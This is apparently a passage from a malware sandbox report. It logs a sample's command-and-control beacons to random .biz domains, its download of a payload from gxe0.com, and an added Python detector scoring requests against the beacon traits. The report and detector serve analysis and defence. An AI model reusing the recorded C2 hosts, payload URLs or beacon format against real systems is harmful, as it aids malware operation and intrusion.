    Data Ascii: HNfW6$cWW{*dh'XNa3GLsRO|Ye66XJ^q!9HHBKb4qL1Ec&UswD]wsdBX6.q.F7hSQl4HLY^>bqac5+%w.}[cuKYI{|fQ;
Nov 26, 2024 08:16:02.795696020 CET | 409 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:16:02 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=17d27082e3a6d928090ddb2d586cd502|8.46.123.75|1732605362|1732605362|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
116 | 192.168.2.10 | 50102 | 13.251.16.150 | 80 | 6072 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:16:02.568311930 CET | 352 | OUT | POST /pgnqnbmeojw HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: gcedd.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Nov 26, 2024 08:16:02.568563938 CET | 778 | OUT | Data Raw: 87 32 6e f4 e2 08 78 6f fe 02 00 00 b9 28 61 bb e0 38 2a da 16 fe 73 a1 3b 21 dc 85 07 f1 95 6b d4 75 80 a3 c1 84 8a 8c a4 ab df 03 fc 0a ec 82 3a d7 cc 39 77 27 2c 80 ea a9 69 09 f7 d4 fd d3 d6 76 03 15 a9 54 b0 45 b1 f0 49 a8 5d f7 fd fe 01 1c
  Data Ascii: 2nxo(a8*s;!ku:9w',ivTEI]nBO4T;om3Q;SGgzz5@&2?I:)Ag:kpTi=}=V!CFD7;m1rg*uS>&/ kEy^
Nov 26, 2024 08:16:04.618019104 CET | 407 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 26 Nov 2024 07:16:04 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=fafae6ad68fab49560c8bee96abfa37f|8.46.123.75|1732605364|1732605364|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.10 | 50103 | 13.251.16.150 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:16:03.139421940 CET | 346 | OUT | POST /onutm HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: gcedd.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 834
Nov 26, 2024 08:16:03.139642954 CET | 834 | OUT | Data Raw: 34 0a 1b df 9b 80 f9 c5 36 03 00 00 c5 ee 9e d7 20 a0 27 fd 74 a5 b8 50 a7 9c 6a cd 49 d5 3a 0c fa c3 f7 9d 13 18 0a 28 e9 72 c9 c6 f2 b6 a4 b5 bb a1 cb 5b 91 15 04 ec 54 9b 16 ac 5d b5 ab 5f 6f a8 99 65 3a 65 11 26 a2 3f 06 ac 51 93 f9 7c 19 97
  Data Ascii: 46 'tPjI:(r[T]_oe:e&?Q|SRsgryQ{'sR1T<4(3-lFUW}-gTn'"4\1:#<dT+Y,Nu*LA<;]w!j$<WgmQ_
Nov 26, 2024 08:16:05.230103016 CET | 407 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 26 Nov 2024 07:16:04 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=4dea0b61b58ab12172f56e78b83f77fe|8.46.123.75|1732605364|1732605364|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.10 | 50104 | 13.251.16.150 | 80 | 6072 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:16:05.424184084 CET | 343 | OUT | POST /rw HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: gcedd.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Nov 26, 2024 08:16:05.424282074 CET | 778 | OUT | Data Raw: 01 1d 32 6a 49 46 f2 b7 fe 02 00 00 09 6a 70 35 70 6e 1b af 89 c4 3b 1e b5 20 a0 51 44 af b3 50 94 4c ad 9a b0 7e 76 02 25 84 3a 33 ae 2e 9a 55 39 bf 7d 18 e6 62 34 a5 94 07 52 20 b6 bb 8f 83 ff cf 3f 29 9d 0b b3 86 c1 fe da 0b c4 d3 fc 7f a0 ad
  Data Ascii: 2jIFjp5pn; QDPL~v%:3.U9}b4R ?)IAos8k ++: ZSU'k;%lz+?3vYw}5#e9Ud$=lATE<fyKjd[m::=LS;Bwv}],
Nov 26, 2024 08:16:07.479110956 CET | 407 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 26 Nov 2024 07:16:07 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=c8c6ed460f28f90c2581761c6b48662f|8.46.123.75|1732605367|1732605367|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.10 | 50105 | 18.208.156.248 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:16:06.066241026 CET | 361 | OUT | POST /sjpfgfxfdnggnnio HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: jwkoeoqns.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 834
Nov 26, 2024 08:16:06.066257954 CET | 834 | OUT | Data Raw: 8a 67 06 b4 7e 54 26 e6 36 03 00 00 80 c7 ea 88 7c 3b 8e 0c d7 23 1b d6 e6 6c d2 df 9e 02 f5 db ca f8 59 be 95 13 aa d9 50 9d ce 43 79 a8 6c 7e 66 1c 7e e3 64 b8 ca 0c d4 c5 41 4a 4e 03 2c 0a 01 d7 ba 0b 97 1c 43 cd 3f 70 1c 36 69 c1 2f 84 13 47
  Data Ascii: g~T&6|;#lYPCyl~f~dAJN,C?p6i/Gb'6u#4@soO[$0t@{jur;4%K3bDES`|&U1dpG/*WBo9w2QDwj@w(u4!G'IVg^zmP"E
Nov 26, 2024 08:16:07.212944984 CET | 411 | IN | HTTP/1.1 200 OK
  Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=dab12de026976e23d39aa38607568f9d|8.46.123.75|1732605367|1732605367|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.10 | 50106 | 18.246.231.120 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:16:08.167040110 CET | 347 bytes | OUT | POST /rntyad HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: xccjj.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 834
Nov 26, 2024 08:16:08.167190075 CET | 834 bytes | OUT | Data Raw: 0b 7d 35 11 de 05 d6 c2 36 03 00 00 1a 71 fa d1 fd 3e dd d6 81 d6 74 7e b0 c4 a7 42 75 34 50 39 f7 af 75 30 a5 83 79 c9 12 2f 28 b1 2c 6a 80 14 17 b4 b2 88 70 2b ca 62 6d 95 18 72 db 8c f9 a0 ac 4d 63 55 21 18 87 19 19 d1 e1 30 33 00 f3 85 11 6a
  Data Ascii: }56q>t~Bu4P9u0y/(,jp+bmrMcU!03j>0}-f`Cm|+]B-o+Zl3V^0zSdG(p Cj|r`@~LPnAq'A}.F(|lP\vCL/wc
Nov 26, 2024 08:16:09.720235109 CET | 407 bytes | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 26 Nov 2024 07:16:09 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=ab22abd1588e0e89cb118d701cf61d46|8.46.123.75|1732605369|1732605369|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
121 | 192.168.2.10 | 50107 | 18.208.156.248 | 80 | 6072 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:16:08.306973934 CET | 353 bytes | OUT | POST /vbngsfyw HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: jwkoeoqns.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Nov 26, 2024 08:16:08.306994915 CET | 778 bytes | OUT | Data Raw: 8c b9 07 c7 fd af 8b 4d fe 02 00 00 fa 23 c8 90 7b bc 76 90 96 45 e9 06 b3 6c 41 c5 71 4f 34 8a fd 36 4a 67 dc e5 e4 2e 60 25 6d 55 74 5c b5 59 5c b3 ef 50 bd 25 95 90 16 90 d5 75 40 59 5b 01 2b 61 ad 01 69 67 03 d3 57 68 2f 51 e0 a4 c2 a4 f6 2a
  Data Ascii: M#{vElAqO46Jg.`%mUt\Y\P%u@Y[+aigWh/Q*6 RbMU=5lsdco]TY7')KgxFPL,!1,KONd\#E5VoNho8,k(*5^lQ
Nov 26, 2024 08:16:09.465893984 CET | 411 bytes | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 26 Nov 2024 07:16:09 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=b1b78fdb1120f4580396c0aa52f5ec0b|8.46.123.75|1732605369|1732605369|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
122 | 192.168.2.10 | 50108 | 18.246.231.120 | 80 | 6072 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:16:09.763420105 CET | 342 bytes | OUT | POST /e HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: xccjj.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Nov 26, 2024 08:16:09.763473034 CET | 778 bytes | OUT | Data Raw: 91 85 40 b6 10 c1 a2 90 fe 02 00 00 52 a7 6f a4 0b c9 96 d4 eb 08 fb 6d 4c 3c 31 ad 16 2a e3 50 53 8c 00 a3 29 5e 71 0e 39 56 5c 54 f1 e2 d6 77 a2 7c d1 61 22 a4 bd ff ea c0 09 3e c5 ba e6 6d e2 59 6a 8f 10 fa 05 ec 36 77 c5 0e 15 47 b2 b1 d5 04
  Data Ascii: @RomL<1*PS)^q9V\Tw|a">mYj6wG:M[<\Z/5)4w2|o\8CUh@3zB+\I:.g hw}KNeKfa7h[^#;c0mdU~CZ}2J
Nov 26, 2024 08:16:11.174073935 CET | 407 bytes | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 26 Nov 2024 07:16:10 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=5f7ad75adeb6989086de543e9eaf9b46|8.46.123.75|1732605370|1732605370|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0
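
Added example, not part of the Joe Sandbox report and not code from the sample: a small Python checker that parses captured HTTP requests and scores them against the beacon pattern that sessions 120 through 122 above have in common (POST, the fixed WeChat/QQBrowser User-Agent, the no-cache header pair, a short .biz host with a single-label path, and a binary body). The request skeletons below are rebuilt from the report's own hosts, paths, Content-Length values and the first 12 bytes of each Data Raw dump; the rest of each body is zero filler because the report truncates the dumps, and the benign request is constructed. The 12-byte prefix check rests on an arithmetic observation about the captured bodies (bytes 8 to 11, read as a little-endian uint32, equal Content-Length minus 12 in each: 0x336 = 822 = 834 - 12 and 0x2fe = 766 = 778 - 12), not on documented protocol knowledge; the meaning of the first eight bytes is not shown on the page.

```python
"""Score captured HTTP requests against the beacon pattern seen in the report.

Added example; the request bodies are partly constructed (see the lead-in).
"""
import re
import struct
from dataclasses import dataclass, field

# User-Agent string exactly as it appears in the captured requests.
BEACON_UA = (
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
    "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400"
)


@dataclass
class Finding:
    host: str
    path: str
    body_len: int
    indicators: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.indicators)


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body).

    Header names are lower-cased so lookups are case-insensitive.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def classify_request(raw: bytes) -> Finding:
    """Return a Finding whose indicators list every beacon trait the request shows."""
    method, path, headers, body = parse_http_request(raw)
    f = Finding(headers.get("host", ""), path, len(body))
    if method == "POST" and headers.get("user-agent") == BEACON_UA:
        f.indicators.append("ua-wechat-qqbrowser")
    if headers.get("cache-control") == "no-cache" and headers.get("pragma") == "no-cache":
        f.indicators.append("no-cache-pair")
    # Captured hosts are bare second-level .biz names; paths are one lowercase label.
    if re.fullmatch(r"[a-z]+\.biz", f.host) and re.fullmatch(r"/[a-z]+", path):
        f.indicators.append("dga-like-host-and-path")
    # Observation from the captures, not a documented format: bytes 8..11 hold a
    # little-endian uint32 equal to the body length minus the 12-byte prefix.
    if len(body) >= 12:
        (declared,) = struct.unpack_from("<I", body, 8)
        if declared == len(body) - 12:
            f.indicators.append("12-byte-prefix-length-field")
    return f


def build_request(host: str, path: str, prefix_hex: str, total_len: int) -> bytes:
    """Rebuild a request like the captured ones.

    The first 12 body bytes come from the report's Data Raw dump; the remainder
    is constructed zero filler, since the report truncates the dump.
    """
    prefix = bytes.fromhex(prefix_hex)
    body = prefix + b"\x00" * (total_len - len(prefix))
    head = (
        f"POST {path} HTTP/1.1\r\n"
        "Cache-Control: no-cache\r\n"
        "Connection: Keep-Alive\r\n"
        "Pragma: no-cache\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {BEACON_UA}\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    )
    return head.encode("ascii") + body


# (host, path, first 12 body bytes, Content-Length) as recorded for sessions 120-122.
SAMPLES = [
    ("xccjj.biz", "/rntyad", "0b7d3511de05d6c236030000", 834),
    ("jwkoeoqns.biz", "/vbngsfyw", "8cb907c7fdaf8b4dfe020000", 778),
    ("xccjj.biz", "/e", "918540b610c1a290fe020000", 778),
]

# Constructed benign request for contrast.
BENIGN = (
    b"POST /api/v1/report HTTP/1.1\r\nHost: telemetry.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\nContent-Length: 5\r\n\r\nhello"
)


def scan(requests):
    """Classify a batch of raw requests."""
    return [classify_request(r) for r in requests]


if __name__ == "__main__":
    for f in scan([build_request(*s) for s in SAMPLES] + [BENIGN]):
        print(f"{f.host}{f.path} len={f.body_len} score={f.score} {f.indicators}")
```

The exact User-Agent string is the cheapest pivot for proxy and IDS logs, since it names a WeChat/QQBrowser build that has no business appearing on an English-language Windows 7 host, let alone from C:\Windows\System32\alg.exe; the length-field check is a second, content-based signal that survives a change of domain or path but should be re-verified against fresh captures before being trusted in production.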


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
123         192.168.2.10  50109        44.221.84.105   80                7892  C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:16:10.446607113 CET  352                OUT        POST /isfkmckm HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: hehckyov.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:16:10.446607113 CET  834                OUT        Data Raw: 43 30 fc 4c f5 24 47 39 36 03 00 00 84 32 a4 9c a6 73 eb ae d1 d0 35 b0 ca a6 c3 c6 e0 13 6b 74 7c 83 17 4d ec 1a f0 71 87 bf 53 b7 6b 1f d0 4f 17 19 e5 22 56 69 63 f1 4a ed 55 27 77 93 87 1b 71 5d 57 45 8f 46 cf 75 ee e1 22 fc 60 c6 a9 04 d4 56
    Data Ascii: C0L$G962s5kt|MqSkO"VicJU'wq]WEFu"`VcUIXb{l_MQO_;W\A#qHa%dR{jY;f$rcwr,csWVkaZzp4$}_>_,t
Nov 26, 2024 08:16:11.578910112 CET  410                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:16:11 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=3a9a879262d00b3246db067f6b2c5826|8.46.123.75|1732605371|1732605371|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
124         192.168.2.10  50110        44.221.84.105   80                6072  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:16:11.517330885 CET  346                OUT        POST /xc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: hehckyov.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 26, 2024 08:16:11.517457962 CET  778                OUT        Data Raw: 96 05 39 04 98 71 db ad fe 02 00 00 1d e8 bb 3d 69 a6 df 9c 13 77 86 13 df fe 76 a5 8b 90 a7 62 74 01 d9 d6 37 df d1 ef 4a e5 7d a2 4b 67 ae 4a 72 a3 ea a2 92 67 f9 9c c6 1d 98 84 9b 09 3a ba 02 d8 1c fc c7 82 72 65 5e c4 7a f1 e8 88 51 a4 dc 41
    Data Ascii: 9q=iwvbt7J}KgJrg:re^zQAS)0rtP{W'gG|V"&~uqmBo!S Bj^Xun8%uFY!p+~]%bY^yV?q:t`4o
Nov 26, 2024 08:16:12.667970896 CET  410                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:16:12 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=fec4183d8a417f0fd8742197dceda1ac|8.46.123.75|1732605372|1732605372|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
125         192.168.2.10  50111        54.244.188.177  80                7892  C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:16:12.808953047 CET  358                OUT        POST /fwkhevjnywgrfjvo HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: rynmcq.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:16:12.809279919 CET  834                OUT        Data Raw: 00 8e 80 ca be db 4d 8a 36 03 00 00 3d c1 00 00 c5 26 64 e9 9d a2 7f da 9d 12 09 66 27 dc f0 71 c1 bf f7 08 aa 95 6d 43 7b c4 4e 72 50 43 4c 24 66 66 22 5d 3b 27 db 7b 4e 6a 74 9d 76 18 61 43 8a 8a cb 0b 17 90 9f 9a c2 ec 4a d2 f1 03 9e 53 2f 9e
    Data Ascii: M6=&df'qmC{NrPCL$ff"];'{NjtvaCJS/]\m|qG+YLC*_i)1l=gh5Dtcl[y_zihU>T(mj+p-I+X5_-*;BQeOdfQNJ)`| s
Nov 26, 2024 08:16:14.157366991 CET  408                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:16:13 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=a6ee343dbc2d39727ad9b0d2a41e3385|8.46.123.75|1732605373|1732605373|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
126         192.168.2.10  50112        54.244.188.177  80                6072  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:16:13.129847050 CET  346                OUT        POST /qqnj HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: rynmcq.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 26, 2024 08:16:13.129847050 CET  778                OUT        Data Raw: 51 4d db df 3f 8c 4d 3f fe 02 00 00 ff d1 9b 31 39 f7 e5 84 55 82 80 7f b0 90 f6 a9 49 76 0a db 6e 18 9e f1 80 2d 3f c6 90 93 00 66 ef 4d c5 9b b5 52 7c ed d7 25 43 c2 bc 82 8a 41 07 68 ae 00 c8 82 3f fe 87 20 2f 2d 57 db 3f cc 3b b8 5d 26 cb 8f
    Data Ascii: QM?M?19UIvn-?fMR|%CAh? /-W?;]&x:G70L#wnqDKi?E`#>~9'W(*a;Dr&^bIS}?mP>T%t_j!t3J0t DQL"c@O_?ont=TGZxh
Nov 26, 2024 08:16:14.536930084 CET  408                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:16:14 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=2f6407e22654de746f52a84d1568af01|8.46.123.75|1732605374|1732605374|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49708 | 198.252.105.91 | 443 | 7852 | C:\Users\user\Desktop\C6dAUcOA6M.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:12:12 UTC | 162 | OUT | GET /yak2/233_Juqmtmyadyy HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: gxe0.com
2024-11-26 07:12:13 UTC | 365 | IN | HTTP/1.1 200 OK
Connection: close
last-modified: Thu, 14 Nov 2024 22:46:27 GMT
accept-ranges: bytes
content-length: 3182288
date: Tue, 26 Nov 2024 07:12:12 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:13 UTC | 1003 | IN | Data Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 66 47 78 6f 54 45 43 41 55 4a 42 55 57 49 52 67 68 4a 79 59 58 48 79 59 51 47 68 4d 55 44 67 34 57 4a 52 30 65 46 41 34 57 49 42 34 53 44 67 38 55 48 78 6b 4f 49 43 55 61 48 61 61 75 70 56 6b 6a 70 37 46 4c 56 53 49 65 47 69 45 61 4a 67 34 52 4a 69 61 6d 72 71 56 5a 49 36 65 78 53 31 35 36 65 58 4a 76 58 33 4e 6a 64 48 56 67 64 32 42 6d 5a 58 5a 65 5a 57 39 35 63 6e 4e 74 62 58 56 6b 58 46 31 7a 62 58 56 66 58 58 46 74 62 6e 4e 65 65 47 31 66 5a 48 6c 63 58 6e 70 35 63 6d 39 66 63 32 4e 30 64 57 42 33 59 47 5a 6c 64 6c 35 6c 62 33 6c 79 63 32 31 74 64 57 52 63 58 58 4e 74 64 56 39 64 63 57 31 75 63 31 35 34 62 56 39 6b 65 56 78 65 65 6e 6c 79 62 31 39 7a 59 33 52 31 59 48 64 67 5a 6d 56 32 58 6d 56 76 65 58 4a 7a 62 57 31
